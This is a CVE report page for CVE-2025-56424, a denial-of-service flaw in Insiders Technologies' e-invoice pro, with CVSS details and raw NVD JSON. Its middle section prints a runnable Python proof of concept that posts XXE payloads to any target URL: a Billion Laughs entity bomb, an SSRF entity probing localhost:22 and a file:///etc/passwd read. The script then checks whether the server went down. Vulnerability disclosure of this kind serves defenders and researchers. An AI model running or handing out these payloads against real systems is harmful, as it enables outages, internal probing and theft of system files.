Security Vulnerability Report
中文
CVE-2025-56424 CVSS 7.5 HIGH

CVE-2025-56424

Published: 2026-01-08 17:15:48
Last Modified: 2026-01-12 17:15:33
Source: [email protected]

Description

An issue in Insiders Technologies GmbH e-invoice pro before release 1 Service Pack 2 allows a remote attacker to cause a denial of service via a crafted script

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:insiders-technologies:e-invoice_pro:1.0:-:*:*:*:*:*:* - VULNERABLE
e-invoice pro release 1 < Service Pack 2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-56424 PoC - e-invoice pro XXE Injection leading to DoS Note: This PoC is for educational and authorized testing purposes only. """ import requests import argparse import time def create_xxe_payload(payload_type='dos'): """Generate XXE payload based on attack type""" if payload_type == 'dos': # Billion Laughs attack - resource exhaustion payload = '''<?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY lol "lol"> <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> ]> <root>&lol5;</root>''' elif payload_type == 'ssrf': # Server-Side Request Forgery payload = '''<?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://localhost:22"> ]> <root>&xxe;</root>''' elif payload_type == 'file_read': # Local file read payload = '''<?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root>&xxe;</root>''' else: payload = '''<?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]> <root>&xxe;</root>''' return payload def exploit_xxe(target_url, payload_type='dos', timeout=30): """Send XXE payload to target""" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/xml', } payload = create_xxe_payload(payload_type) print(f"[*] Target: {target_url}") print(f"[*] Payload type: {payload_type}") print(f"[*] Sending malicious XML payload...") try: response = requests.post( target_url, data=payload, headers=headers, timeout=timeout, verify=False ) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Length: {len(response.text)}") if response.status_code != 200: print("[*] Server may have rejected the request or crashed") return True if payload_type == 'dos': # Check if server is still responsive time.sleep(2) try: health_check = requests.get( target_url.replace('/upload', '/health').replace('/process', '/health'), timeout=10 ) print("[!] Server still responsive - DoS may require multiple requests") except: print("[+] Server appears to be unresponsive - DoS successful") return True return False except requests.exceptions.Timeout: print("[+] Timeout detected - Server may be processing malicious payload") return True except requests.exceptions.ConnectionError: print("[+] Connection failed - Server may be down") return True except Exception as e: print(f"[-] Error: {str(e)}") return False if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-56424 XXE PoC') parser.add_argument('-t', '--target', required=True, help='Target URL') parser.add_argument('-p', '--payload', default='dos', choices=['dos', 'ssrf', 'file_read'], help='Payload type') parser.add_argument('--timeout', type=int, default=30, help='Request timeout') args = parser.parse_args() exploit_xxe(args.target, args.payload, args.timeout)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56424", "sourceIdentifier": "[email protected]", "published": "2026-01-08T17:15:47.840", "lastModified": "2026-01-12T17:15:32.863", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in Insiders Technologies GmbH e-invoice pro before release 1 Service Pack 2 allows a remote attacker to cause a denial of service via a crafted script"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:insiders-technologies:e-invoice_pro:1.0:-:*:*:*:*:*:*", "matchCriteriaId": "3295CE0B-8050-4328-B816-714C5E9A0E27"}]}]}], "references": [{"url": "https://insiders-technologies.com/en/e-invoice/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://mind-bytes.de/xml-external-entity-xxe-injection-in-e-invoice-pro-cve-2025-56424/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.